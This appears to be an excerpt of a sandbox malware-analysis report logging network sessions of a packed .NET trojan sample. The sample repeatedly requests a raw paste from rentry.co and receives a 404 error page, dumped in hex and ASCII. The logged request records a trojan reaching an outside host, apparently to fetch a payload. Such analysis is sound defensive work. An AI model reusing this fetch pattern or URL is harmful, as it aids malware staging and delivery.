                                                                                        2024-10-18 10:43:29 UTC707INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:29 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:43:29 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:29 UTC1015INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 37 63 33 38 36 37 61 39 31 35 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 77 4f 53 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed7c3867a915',t:'MTcyOTI0ODIwOS4w
                                                                                        2024-10-18 10:43:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        41192.168.2.660690104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:30 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:30 UTC683INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:30 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2z2%2BRvMaWQpHoKQvT%2BdiHfDZfl%2FtWcCsQfSbghDzu2bN3thk8tMs7zVGLZ0HVkFxR2avcCNGL9TFEToDc5YsLmajiHH2%2Fx8hfShUcJnBThGWxFQBePlLfET%2BKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed84ca6f7d5b-DFW
                                                                                        2024-10-18 10:43:30 UTC686INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:30 UTC1369INData Raw: 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20
                                                                                        Data Ascii: icons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and
                                                                                        2024-10-18 10:43:30 UTC1369INData Raw: 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74
                                                                                        Data Ascii: entry.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container cont
                                                                                        2024-10-18 10:43:30 UTC1035INData Raw: 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 38 34 63 61 36 66 37 64 35 62
                                                                                        Data Ascii: cript src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed84ca6f7d5b
                                                                                        2024-10-18 10:43:30 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:43:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        42192.168.2.660692104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:31 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:32 UTC675INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:32 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4yUXZZ6vVkTDBbNCDQqD8JQdfKaLbjqVYtt9udLTCiEPSRmMVoP%2FYK8XUAkvtREAHj2qV3JaIsRy4SseMCY94Mlt0HYfCIuGIzAiJDiX3nqR7zOddTiAKHaWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed8d1ba64863-DFW
                                                                                        2024-10-18 10:43:32 UTC694INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:32 UTC1369INData Raw: 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e
                                                                                        Data Ascii: 2.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing.
                                                                                        2024-10-18 10:43:32 UTC1369INData Raw: 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d
                                                                                        Data Ascii: g' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-sm
                                                                                        2024-10-18 10:43:32 UTC1028INData Raw: 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 38 64 31 62 61 36 34 38 36 33 27 2c 74 3a 27 4d 54 63
                                                                                        Data Ascii: c="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed8d1ba64863',t:'MTc
                                                                                        2024-10-18 10:43:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        43192.168.2.660693104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:33 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:33 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:33 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdh5cfke1T9pfRnQiQz95FLah3NUeZfyNJafxwwXlVTHmb3vFpfR9bfxWadLHkrRUKr6lZ9JIOB05W%2Fw4ERBGRCYWxcQlJVIQP%2BFT4Fu2kTj5wqbIZsNJHwOTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed952a3a3470-DFW
                                                                                        2024-10-18 10:43:33 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:33 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:43:33 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:43:33 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 39 35 32 61 33 61 33 34 37 30 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 78 4d 79 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed952a3a3470',t:'MTcyOTI0ODIxMy4wMDAwMDA=
                                                                                        2024-10-18 10:43:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        44192.168.2.660694104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:34 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:34 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:34 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WkXnsBMkQ6Lbb0L5W%2FM0kXEyIUkDeD9guSsWSfhsZ7jIikeVZ8eLSTwNs0B6fKuT5TRYfY%2F92IJyrJALVYrQyZfYEov9LazpBqrqxVUBSFV36r0IM9FcCq7jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed9d1e390b71-DFW
